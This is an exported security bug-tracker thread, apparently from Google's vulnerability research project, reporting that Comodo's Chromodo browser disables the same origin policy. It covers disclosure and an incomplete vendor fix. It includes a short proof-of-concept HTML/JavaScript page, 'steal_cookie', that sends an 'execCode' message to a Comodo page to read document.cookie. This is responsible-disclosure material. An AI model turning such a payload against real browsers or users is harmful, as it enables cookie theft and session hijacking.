Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security.

[GoogleCodeExporter]

When you install Comodo Internet Security, by default a new browser called 
Chromodo is installed and set as the default browser. Additionally, all 
shortcuts are replaced with Chromodo links and all settings, cookies, etc are 
imported from Chrome. They also hijack DNS settings, among other shady 
practices.

https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.
php

Chromodo is described as "highest levels of speed, security and privacy", but 
actually disables all web security. Let me repeat that, they  ***disable the 
same origin policy***.... ?!?..

To reproduce, do something like this:

<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click 
Here</a>
</body>
</html>

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by tav...@google.com on 22 Jan 2016 at 12:49

• Blocking: #713

Attachments:

• [Windows 7 x86-2016-01-21-16-48-44.png](https://storage.googleapis.com/google-code-attachments/google-security-research/issue-704/comment-0/Windows 7 x86-2016-01-21-16-48-44.png)

[GoogleCodeExporter]

I've attached a working exploit for this issue. I haven't received an 
acknowledgement or response from Comodo, so I sent this reply:

FYI, I still haven't got a response. The same origin policy is basically 
disabled for all of your customers, which means there is no security on the 
web....this is about as bad as it gets. If the impact isn't clear to you, 
please let me know.

This vulnerability is bad enough to start paging people.

Original comment by tav...@google.com on 25 Jan 2016 at 7:19

Attachments:

• exploit.html

[GoogleCodeExporter]

Comodo replied that they're planning a hotfix for this issue within a day, but 
the other open issues may take weeks to fix.

I replied that I noticed their scan process is not using ASLR, which probably 
isn't a good sign going forward, and I'm planning to start a more thorough 
audit next week.

Original comment by tav...@google.com on 29 Jan 2016 at 5:15

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

It looks like Comodo pushed a change that removes the "execCode" API that I was 
using in my exploit. 

This is obviously an incorrect fix, and a trivial change makes the 
vulnerability still exploitable. After "discussion" with Comodo (I can't really 
get any response from them, but I'm trying), I'll consider this bug fixed and 
file a new bug with the trivial bypass of their fix as a new issue.

The deleted comments above contained discussion about the bypass, I'll move 
them into a new issue.

Original comment by tav...@google.com on 2 Feb 2016 at 6:46

• Changed state: Fixed
• Removed labels: Restrict-View-Commit

[GoogleCodeExporter]

Discussion about the incorrect fix is in issue 713.

Original comment by tav...@google.com on 2 Feb 2016 at 6:52

[GoogleCodeExporter]

Original comment by tav...@google.com on 2 Feb 2016 at 6:53

• Now blocking: #713

[GoogleCodeExporter]

"After "discussion" with Comodo (I can't really get any response from them, but 
I'm trying)"

Hopefully this being posted on HackerNews will help. If not, rampant 
exploitation of Comodo browsers ought to incentivize companies to cancel their 
subscriptions and Comodo will lose money.

Original comment by kobrasre...@gmail.com on 2 Feb 2016 at 7:35

[GoogleCodeExporter]

toppest of keks, my friend.

There's plenty of evidence of the shadiness of Chromodo, it gets pushed via the 
kind of PUP bundler networks that also push winlocker trojans of Indian origin.

Original comment by l33t...@gmail.com on 2 Feb 2016 at 8:36

[GoogleCodeExporter]

Original comment by tav...@google.com on 2 Feb 2016 at 8:38

• Added labels: Restrict-AddIssueComment-Commit